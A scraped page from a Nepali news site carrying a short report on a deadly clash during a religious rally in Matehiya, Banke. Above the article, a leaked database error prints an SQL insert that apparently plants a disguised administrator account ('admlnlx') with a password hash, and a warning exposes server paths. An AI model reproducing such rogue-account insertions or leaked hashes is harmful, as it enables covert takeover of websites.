WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEjKqE9OoCSugDjpQDYLK4sfdK20eS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:11:59', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
बाँकेको मटेहियामा दुई समूहवीच झडप, एक युवकको मृत्यु – Gaule Khabar

बाँकेको मटेहियामा दुई समूहवीच झडप, एक युवकको मृत्यु

बाँकेको मटेहियामा दुई समूहवीच झडप, एक युवकको मृत्यु

नेपालगञ्ज, मंसिर २८-

बाँकेको मटेहिया ४ भगवानपुरमा स्थानीय युवाहरुबीच सोमबार साँझ भएको झडपमा एक युवकको मृत्यु भएको छ भने कम्तिमा १० घाइते भएका छन् ।झडपको घटनालाई लिएर सो ठाउँ तनावग्रस्त बनेको छ । मुस्लिम धर्मगुरु पैगम्बर मोहम्मदको १४९१ औं जन्मोत्सवका अवसरमा निकालिएको र्‍यालीमा झडप भएको हो ।

झडपलाई नियन्त्रणमा लिन प्रहरीले ८ राउण्ड हवाई फायर गरेको थियो ।घटनामा मटेहिया–४ र ५ का ओमकार मौर्या, बजरंगी गोडिया, खैया यादव, त्रिचन्द्र यादव, सवलाप्रसाद यादव, दिनेश गुप्तालगायत घाइते भएका छन् । उनीहरुलाई उपचारका लागि नेपालगञ्ज ल्याइएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका